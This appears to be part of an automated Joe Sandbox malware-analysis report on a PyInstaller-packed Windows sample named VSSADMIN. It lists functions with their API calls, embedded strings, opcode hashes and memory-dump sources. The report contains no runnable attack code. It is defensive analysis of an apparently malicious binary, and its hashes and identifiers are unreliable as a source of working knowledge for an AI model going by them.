                                                                                                                                                                      • Instruction Fuzzy Hash: 8A217F33A18A4296DB618F18E48036976B0EB96FA8F244236EA5D876D5DF3DD5018B04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                      • Instruction ID: eaf90d44afeb166a819dae1377bcbe54cf659c47168e4e3329ca6316d345c132
                                                                                                                                                                      • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                      • Instruction Fuzzy Hash: 2401A561A0CF4342E904DB5299D1079A7A1BB87FF0F084636DE5C97BEADE3CD5018704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
                                                                                                                                                                      • Instruction ID: b77321515603504d9b62c82e2a173a6986a4da05f98fdb29e80b7c19908d795b
                                                                                                                                                                      • Opcode Fuzzy Hash: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
                                                                                                                                                                      • Instruction Fuzzy Hash: DC113A32A18E4382F3109B14A4C0579B2B5EB86BA4F55453AE69DC77A2DF7CF810AB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF614C8A8E6,?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E), ref: 00007FF614C8DDC5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
                                                                                                                                                                      • Instruction ID: 2ab543c3322530bba426973a480ad6d1261eab43de51dadf3a8a2d539df9437f
                                                                                                                                                                      • Opcode Fuzzy Hash: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
                                                                                                                                                                      • Instruction Fuzzy Hash: 12F06D44B09A4782FE585B6198D03B512B05F8BFA4F0C4433C90EC73C2EE1CE892A320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF614C7FE74,?,?,?,00007FF614C81386,?,?,?,?,?,00007FF614C82979), ref: 00007FF614C8CB3A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
                                                                                                                                                                      • Instruction ID: bca662125605553ae1b21a038d26fc7c5dfebe982e319e74c95680a684b58faa
                                                                                                                                                                      • Opcode Fuzzy Hash: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
                                                                                                                                                                      • Instruction Fuzzy Hash: 72F05860F0DE8745FE2456A298D027652A05FCAFB4F080732D82EC72C2DE2CE841E120
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalDeleteSection
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 166494926-0
                                                                                                                                                                      • Opcode ID: c87858656cf315d08959815e89120c56aa562766f4cd24e00349d691214fe034
                                                                                                                                                                      • Instruction ID: 14a2566d7e00c64c72c94caa7bf31536ca23298b02aca0b031a5a7305df29beb
                                                                                                                                                                      • Opcode Fuzzy Hash: c87858656cf315d08959815e89120c56aa562766f4cd24e00349d691214fe034
                                                                                                                                                                      • Instruction Fuzzy Hash: 85F03061E18D0781FB04ABA6D8C137813B0EF97FB5F000037CD0DC72529E1CA4909221
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DirectoryErrorLastRemove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 377330604-0
                                                                                                                                                                      • Opcode ID: 421877e3912a0793c8b229f65e0544724a19ed071a722aede8cfb3d7b9fe0b6d
                                                                                                                                                                      • Instruction ID: 71d1813f267b5422d99a7772cf2db7702c6980e0ec52edecbe4f97583a7eb25a
                                                                                                                                                                      • Opcode Fuzzy Hash: 421877e3912a0793c8b229f65e0544724a19ed071a722aede8cfb3d7b9fe0b6d
                                                                                                                                                                      • Instruction Fuzzy Hash: 0B418716E1DE8682E6119B28D5512FD2370FBA6B59F54A233DF8D93193EF28B1D8C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for 
Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                                                                      • API String ID: 190572456-3109299426
                                                                                                                                                                      • Opcode ID: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
                                                                                                                                                                      • Instruction ID: 820fcf5087af11d6701d077da3f7f76edcc49149595e5afffe47fb918676a7f8
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
                                                                                                                                                                      • Instruction Fuzzy Hash: 46423564A0EF47B2EE558B08E9D117422B2BF46FB9B946037C40E87364FF7EA559C200
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                      • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                      • API String ID: 2446303242-1601438679
                                                                                                                                                                      • Opcode ID: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
                                                                                                                                                                      • Instruction ID: 801b439429b27baf6ecd1df9797fe4a70b957b65cb2c3ca371bbec845ee868d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
                                                                                                                                                                      • Instruction Fuzzy Hash: 90A16A36218F8197E7148F26E58479AB370F789BA4F50412AEB8D43B24CF3EE165CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                      • API String ID: 808467561-2761157908
                                                                                                                                                                      • Opcode ID: ccfbaf94e8ba692c66e947d25492209142ad6238170979dce7e9a2c25c803b1f
                                                                                                                                                                      • Instruction ID: fc8279f79a9a551023f1d5c2b5113e7b0bcae5d93e2a73def3c3cd29608f95ea
                                                                                                                                                                      • Opcode Fuzzy Hash: ccfbaf94e8ba692c66e947d25492209142ad6238170979dce7e9a2c25c803b1f
                                                                                                                                                                      • Instruction Fuzzy Hash: 51B2F672A18A829BE7258E64D4807FD77B1FB49B5CF406136DA0E97A94DF39E900CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00007FF614C7269E,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C77507
                                                                                                                                                                      • FormatMessageW.KERNEL32 ref: 00007FF614C77536
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 00007FF614C7758C
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ErrorLastMessage$ByteCharFormatMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
• API String ID: 2920928814-3505189403
• Opcode ID: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
• Instruction ID: 9e498f8d3759ac16d0be59944cde15ce73329b611ef7225304972c15ac2f5965
• Opcode Fuzzy Hash: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
• Instruction Fuzzy Hash: DE217F31A0CE4792EB609B14E8C42B672B5FB4ABA9F844037E54EC36A4EF7DE505C700
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
• Instruction ID: f8043513b5143111166cb1be153dfde0e0a9889e6b983e9f6b1439ac5fa07e28
• Opcode Fuzzy Hash: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
• Instruction Fuzzy Hash: FD314D76608E8196EB608F64E8803E97371FB85B58F44403ADB4D87A98EF3DD648C710
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
• Instruction ID: 0a12bd7df231abbe741c659f4b0952ab2586f86e3b7f15c9633988d0bca6aba2
• Opcode Fuzzy Hash: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
• Instruction Fuzzy Hash: 67314136618F8196DB64CB25E8802EE73B4FB85B68F500136EA9D83B95DF3DD545C700
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: 19aa5fc60aa927df0bce9d38497bbf586f0f8b4e80b2d1e9978e290f43184bb9
• Instruction ID: 962ff6a41b4d55d3988710cef1e5ff54d8f6c494a582aed03bfcb54f23ff9a01
• Opcode Fuzzy Hash: 19aa5fc60aa927df0bce9d38497bbf586f0f8b4e80b2d1e9978e290f43184bb9
• Instruction Fuzzy Hash: FFB1B562B19E9651EA609B26D4806BA63B1EB46FF8F444133EE5D87B85DF3DE441C300
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
• Instruction ID: 7f69d9357170e07e26837de23a0613233fc01596517e9ceb7176968b1c8b03d6
• Opcode Fuzzy Hash: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
• Instruction Fuzzy Hash: D3113326B14F419AEF00CF64E8942B933B4FB19B68F440D32EA6D87764EF79D1958380
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
• Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
• Instruction ID: c27b1394e6e669b57e37106fe4829224cf80bbe4eb29b6194d7c41afc32d0927
• Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
• Instruction Fuzzy Hash: 7BC11672B18A8697D734CF15E08466AB7A1F789B98F049136DB4E83794DF3EE901CB00
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
